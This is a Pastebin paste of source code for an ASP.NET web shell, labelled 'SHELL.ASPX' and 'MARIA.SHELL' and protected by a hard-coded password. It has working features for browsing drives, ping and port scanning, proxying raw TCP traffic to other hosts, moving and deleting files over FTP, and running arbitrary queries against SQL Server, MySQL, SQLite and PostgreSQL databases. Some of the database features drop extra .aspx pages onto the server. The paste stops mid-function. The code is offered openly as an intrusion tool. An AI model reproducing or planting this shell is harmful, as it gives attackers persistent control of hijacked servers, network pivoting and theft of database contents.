Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%@ Page Language="C#" EnableViewState="false" %>
- <%@ Import Namespace="System.Net.NetworkInformation" %>
- <%@ Import Namespace="System.Web.UI.WebControls" %>
- <%@ Import Namespace="System.Data.SqlClient" %>
- <%@ Import Namespace="System.Net.Sockets" %>
- <%@ Import Namespace="System.Diagnostics" %>
- <%@ Import Namespace="System.Net" %>
- <%@ Import Namespace="System.IO" %>
- <%
- // Password Shell //////////////////////////////////////////////////////////////////////////////////////
- String PASSWORG_SHELL = "lulz4u";
- ////////////////////////////////////////////////////////////////////////////////////////////////////////
- // Variables
- string MARIA = Path.GetFileName(Request.Path);
- string MainDrive = Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
- string Output = "";String Folders = "";
- String Files = ""; String Binaries = ""; String PORTSCAN = "";
- String ResultSearchOuput = "<h1>Result Found</h1>"; String OutputFTPBuffer = ""; String querys = "";
- String OutputFTPStatus="";String DirFTP="";String attributesOfFiles="";String SQLView="";String PINGSCAN="";
- // List Storages
- string CurrentFolder = Page.MapPath(".") + "/";
- if (!string.IsNullOrEmpty(Request.QueryString["Directory"]))
- CurrentFolder = Request.QueryString["Directory"] + "/";
- CurrentFolder = CurrentFolder.Replace("\\", "/");
- CurrentFolder = CurrentFolder.Replace("//", "/");
- foreach(DriveInfo curdrive in DriveInfo.GetDrives())
- {
- if (!curdrive.IsReady)
- continue;
- string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
- Output += string.Format("<a href='?Directory={0}' title='{2} Bytes Free'><input type='button' value='{1}'></a> ", HttpUtility.UrlEncode(driveRoot), HttpUtility.HtmlEncode(driveRoot), curdrive.TotalFreeSpace);
- }
- // PING Scan
- if(!string.IsNullOrEmpty(Request.Form["Range"])){
- Ping pinger = new Ping();
- int TIMEOUT = Convert.ToInt32(Request.Form["Timeout"]);
- PINGSCAN += "<table class='tabla'> <tr> <th scope='col'>IP</th> <th scope='col'>Status</th> </tr>";
- string[] IPRange = Request.Form["Range"].Split('.');
- for(int index=0;index != 255;index++){
- try {
- PingReply reply = pinger.Send(IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index,TIMEOUT);
- bool pingable = false;
- pingable = reply.Status == IPStatus.Success;
- if (pingable == true)
- {
- PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td><font color='green'>LIVE</font></td></tr>";
- }else{
- PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
- }
- }
- catch (PingException)
- {
- PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
- }
- }
- PINGSCAN += "</table><script>DivShowAndHidden('PSCAN');</script>";
- }
- // PORT Scan
- if(!string.IsNullOrEmpty(Request.Form["IPSCAN"])){
- string[] port = Request.Form["Ports"].Split(',');
- PORTSCAN += "<table class='tabla'> <tr> <th scope='col'>Port</th> <th scope='col'>Status</th> </tr>";
- TcpClient socket = new TcpClient();
- IPAddress address = IPAddress.Parse(Request.Form["IPSCAN"]);
- socket.SendTimeout = 3000;
- socket.ReceiveTimeout = 3000;
- for(int indexb=0;indexb != port.Length;indexb++){
- try{
- socket.Connect(address, Convert.ToInt32(port[indexb]));
- if(socket.Connected){
- PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td><font color='green'>LIVE</font></td></tr>";
- }else{
- PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
- }
- }catch(Exception e){
- PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
- }
- }
- PORTSCAN += "<script>DivShowAndHidden('PORTSCAN');</script>";
- }
- // PROXY
- if(!string.IsNullOrEmpty(Request.QueryString["REQUEST"])){
- TcpClient socket = new TcpClient();
- IPAddress address = IPAddress.Parse(Request.QueryString["Host"]);
- socket.SendTimeout = 10000;
- socket.ReceiveTimeout = 10000;
- socket.Connect(address, Convert.ToInt32(Request.QueryString["Port"]));
- if(socket.Connected){
- NetworkStream networkStream;
- StreamWriter streamWriter;
- StreamReader streamReader;
- networkStream = socket.GetStream();
- streamReader = new StreamReader(networkStream);
- streamWriter = new StreamWriter(networkStream);
- byte[] data = Convert.FromBase64String(Request.QueryString["REQUEST"]);
- streamWriter.Write(Encoding.UTF8.GetString(data));
- streamWriter.Flush();
- byte[] buffer = new byte[32768];
- int read = 0;
- int chunk;
- while ((chunk = networkStream.Read(buffer, read, buffer.Length - read)) > 0) {
- read += chunk;
- if (read != buffer.Length) { continue; }
- int nextByte = networkStream.ReadByte();
- if (nextByte == -1) { break; }
- byte[] newBuffer = new byte[buffer.Length * 2];
- Array.Copy(buffer, newBuffer, buffer.Length);
- newBuffer[read] = (byte)nextByte;
- buffer = newBuffer;
- read++;
- }
- byte[] ret = new byte[read];
- Array.Copy(buffer, ret, read);
- Response.OutputStream.Write(ret, 0, ret.Length);
- Response.End();
- }
- }
- // FTP Client
- if(!string.IsNullOrEmpty(Request.Form["FTP"])){
- try{
- // List Files in FTP Server
- DirFTP=Request.Form["command"];
- if(!string.IsNullOrEmpty(Request.Form["FolderCurrent"]) & !string.IsNullOrEmpty(DirFTP)){
- DirFTP=Request.Form["FolderCurrent"]+"/"+DirFTP;}
- if(Request.Files["filetoFTP"]==null | Request.Form["action"]=="cd"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.ListDirectoryDetails;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- Stream responseStream = response.GetResponseStream();
- StreamReader reader = new StreamReader(responseStream);
- OutputFTPBuffer="<table class='tabla'><tr><th scope='col'>Output</th></tr>";
- while (!reader.EndOfStream) {OutputFTPBuffer+="<tr><td>"+reader.ReadLine()+"</td></tr>";}
- OutputFTPStatus="</table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST' enctype='multipart/form-data' ><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='download'>Download</option><option value='DeleteFileFTP'>Delete File</option><option value='DeleteFileFolder'>Delete Folder</option><option value='cd'>Change Directory</option><option value='newDir'>New Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='file' name='filetoFTP'> <input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+"</i></b></form>";
- reader.Close();
- response.Close();}
- // Download File to FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="download"){
- int bytesRead = 0;
- byte[] buffer = new byte[2048];
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.DownloadFile;
- Stream reader = request.GetResponse().GetResponseStream();
- FileStream fileStream = new FileStream(@CurrentFolder+Request.Form["command"], FileMode.Create);
- while (true){bytesRead = reader.Read(buffer, 0, buffer.Length);if (bytesRead == 0){break;}fileStream.Write(buffer, 0, bytesRead);}fileStream.Close();
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status, Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
- // Make Folder to FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="newDir"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.MakeDirectory;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- Stream responseStream = response.GetResponseStream();
- StreamReader reader = new StreamReader(responseStream);
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
- // Upload File to FTP Server
- if(Request.Files["filetoFTP"]!=null){}
- // Delete File of FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFTP"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.DeleteFile;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
- response.Close();}
- // Delete Folders of FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFolder"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.RemoveDirectory;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
- response.Close();}
- }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
- }
- // SQL Clients
- if(!string.IsNullOrEmpty(Request.Form["SQLProtocol"]) | !string.IsNullOrEmpty(Request.QueryString["SQLProtocol"])) {
- // For each MySQL Services
- String LOCALHOST= Request.Form["host"] + Request.QueryString["host"];
- String PORT = Request.Form["port"] + Request.QueryString["port"];
- String USERNAME = Request.Form["user"] + Request.QueryString["user"];
- String PASSWORD = Request.Form["pass"] + Request.QueryString["pass"];
- String DATABASE = Request.Form["database"] + Request.QueryString["database"];
- String FILE = Request.Form["filename"] + Request.QueryString["filename"];
- // Ms-Mysql Server
- if (Request.Form["SQLProtocol"] == "SQLServer" | Request.QueryString["SQLProtocol"] == "SQLServer")
- {
- try
- {
- String TypeOutput = "";
- System.Data.SqlClient.SqlConnection conn;
- string myConnectionString;
- myConnectionString = "Data Source=" + LOCALHOST + ";uid=" + USERNAME + ";" + "pwd=" + PASSWORD + ";Network Library=DBMSSOCN;Initial Catalog=" + DATABASE + ";";
- conn = new System.Data.SqlClient.SqlConnection();
- conn.ConnectionString = myConnectionString;
- conn.Open();
- String Action = Request.QueryString["Action"];
- Action += Request.Form["Action"];
- if (Action == "SelectTable")
- {
- querys = "SELECT * FROM " + Request.QueryString["Value"] + "";
- TypeOutput = "columns";
- }
- else if (Action == "ListTables")
- {
- querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
- TypeOutput = "Tables";
- }
- else if (!string.IsNullOrEmpty(Request.Form["queryString"]))
- {
- querys = Request.Form["queryString"];
- TypeOutput = "Query";
- }
- else
- {
- querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
- TypeOutput = "Tables";
- }
- System.Data.SqlClient.SqlCommand mycomand = new System.Data.SqlClient.SqlCommand(querys, conn);
- System.Data.SqlClient.SqlDataReader myreader = mycomand.ExecuteReader();
- if (TypeOutput != "Query")
- {
- int CounterColumn = myreader.FieldCount;
- SQLView += "<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>";
- for (int i = 0; i < CounterColumn; i++)
- {
- SQLView += "<th scope='col'>" + myreader.GetName(i) + "</th>";
- }
- while (myreader.Read())
- {
- String Field = "";
- int dbFields = myreader.FieldCount;
- for (int i = 1; i < dbFields; i++)
- {
- Field += "<td>" + myreader[i] + "</td>";
- }
- if (TypeOutput == "Tables")
- {
- SQLView += "<tr><td><a href='?SQLProtocol=SQLServer&Action=SelectTable&host="+LOCALHOST+"&user="+USERNAME+"&pass="+PASSWORD+"&database="+DATABASE+"&Value=" + myreader[2] + "' title='Table'>" + myreader[2] + "</td>" + Field + "</tr>";
- }
- else
- {
- SQLView += "<tr><td>" + myreader[0] + "</td>" + Field + "</tr>";
- }
- Field = "";
- }
- }
- else
- {
- SQLView += "<div class='footTable'><b><h2>Output</h2></b>";
- while (myreader.Read())
- {
- SQLView += myreader[0].ToString();
- }
- SQLView += "</code></div>";
- }
- SQLView += "</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action=" + MARIA + "><input type=hidden name=SQLProtocol value=SQLServer><input type=hidden name=host value=" + LOCALHOST + "><input type=hidden name=database value=" + DATABASE + "><input type=hidden name=user value=" + USERNAME + "><input type=hidden name=pass value=" + PASSWORD + "><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>"+e.Message+"</div>");
- }
- }
- // Mysql Client
- if (Request.Form["SQLProtocol"] == "MySQL" | Request.QueryString["SQLProtocol"] == "MySQL")
- {
- try
- {
- String FileCreateMYSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
- String FileCreateMYSQLb = @"<%";
- String FileCreateMYSQLc = @"String query="""";string MARIA = System.IO.Path.GetFileName(Request.Path);String SQLView="""";MySql.Data.MySqlClient.MySqlConnection conn; string myConnectionString; String LOCALHOST=Request.QueryString[""host""]+Request.Form[""host""]; String USERNAME=Request.QueryString[""user""]+Request.Form[""user""]; String PASSWORD=Request.QueryString[""pass""]+Request.Form[""pass""]; String DATABASE = Request.QueryString[""database""]+Request.Form[""database""]; myConnectionString = ""server=""+LOCALHOST+"";uid=""+USERNAME+"";"" + ""pwd=""+PASSWORD+"";database=""+DATABASE+"";""; try {conn = new MySql.Data.MySqlClient.MySqlConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String TypeOutput = """"; String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {query = ""SELECT * FROM `"" + Request.QueryString[""Value""] + ""`""; } else if (Action == ""ListTables"") {query = ""SHOW FULL TABLES FROM ""+Request.Form[""database""]; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {query = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {query = ""SHOW FULL TABLES FROM ""+DATABASE; TypeOutput = ""Tables""; } MySql.Data.MySqlClient.MySqlCommand mycomand = new MySql.Data.MySqlClient.MySqlCommand(query, conn); MySql.Data.MySqlClient.MySqlDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = "" ""; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=Mysql&Action=SelectTable&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > MYsql Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=Mysql><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; } catch (Exception e) {Response.Write(""</table><div class='alert'>SHELL.ASPX Message: "" + e.Message + ""</div>"");}Response.Write(SQLView);";
- String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
- using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
- System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateMYSQLa + FileCreateMYSQLb + FileCreateMYSQLc + "%" + ">" + StyleHTML);
- SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>" + e.Message + "</div>");
- }
- }
- // SQLite Client
- if (Request.Form["SQLProtocol"] == "SQLite" | Request.QueryString["Postgresql"] == "SQLite")
- {
- try
- {
- String FileCreateSQLitea = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
- String FileCreateSQLiteb = @"<%";
- String FileCreateSQLitec = @"try{String SQLView = """"; String TypeOutput = """"; String querys = """"; string myConnectionString; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string FILE = Request.Form[""filename""] + Request.QueryString[""filename""]; myConnectionString = ""Data Source=""+FILE; System.Data.SQLite.SQLiteConnection conn; conn = new System.Data.SQLite.SQLiteConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } System.Data.SQLite.SQLiteCommand mycomand = new System.Data.SQLite.SQLiteCommand(querys, conn); System.Data.SQLite.SQLiteDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = """"; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=SQLite&Action=SelectTable&filename=""+FILE+""&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > SQLite Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=SQLite><input type=hidden name=filename value="" + FILE + ""><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>""+e.Message+""</div>""); }";
- String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
- using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
- System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateSQLitea + FileCreateSQLiteb + FileCreateSQLitec + "%" + ">" + StyleHTML);
- SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?filename="+FILE+"&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>" + e.Message + "</div>");
- }
- }
- // PostgreSQL Client
- if (Request.Form["SQLProtocol"] == "PostgreSQL" | Request.QueryString["Postgresql"] == "PostgreSQL")
- {
- try
- {
- String FileCreatePostgresSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
- String FileCreatePostgresSQLb = @"<%@ Import Namespace=""System"" " + "%" + ">";
- String FileCreatePostgresSQLc = @"<%@ Import Namespace=""System.Text"" " + "%" + ">";
- String FileCreatePostgresSQLd = @"<%@ Import Namespace=""Npgsql"" " + "%" + ">";
- String FileCreatePostgresSQLe = @"<%@ Import Namespace=""System.Data"" " + "%" + ">";
- String FileCreatePostgresSQLf = @"<%";
- String FileCreatePostgresSQLg = @"string TypeOutput = """"; string SQLView = """"; string querys = """"; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string conStr = ""Server=""+LOCALHOST+""; User Id=""+USERNAME+""; Password=""+PASSWORD+""; Database=""+DATABASE+"";""; NpgsqlConnection conn = new NpgsqlConnection(conStr); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'""; TypeOutput = ""Tables""; } NpgsqlCommand com = new NpgsqlCommand(querys, conn); NpgsqlDataAdapter ad = new NpgsqlDataAdapter(com); DataTable dt = new DataTable(); if(conn != null && conn.State == ConnectionState.Open) {conn.Close(); } else {conn.Open(); } ad.Fill(dt); NpgsqlDataReader dRead = com.ExecuteReader(); try {if (TypeOutput != ""Query"") {int CounterColumn = dRead.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + dRead.GetName(i) + ""</th>""; } while (dRead.Read()) {String Field = """"; int dbFields = dRead.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + dRead[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=PostgreSQL&Action=SelectTable&host="" + LOCALHOST + ""&user="" + USERNAME + ""&pass="" + PASSWORD + ""&database="" + DATABASE + ""&Value="" + dRead[2] + ""' title='Table'>"" + dRead[2] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + dRead[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>Output</h2></b>""; while (dRead.Read()) {SQLView += dRead.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=PostgreSQL value=SQLite><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>"";Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>"" + e.Message + ""</div>"");} finally{dRead.Close();dRead = null;conn.Close();conn = null;com.Dispose();com = null;}";
- String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
- using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
- System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreatePostgresSQLa + FileCreatePostgresSQLb + FileCreatePostgresSQLc + FileCreatePostgresSQLd + FileCreatePostgresSQLe + FileCreatePostgresSQLf + FileCreatePostgresSQLg + "%" + ">" + StyleHTML);
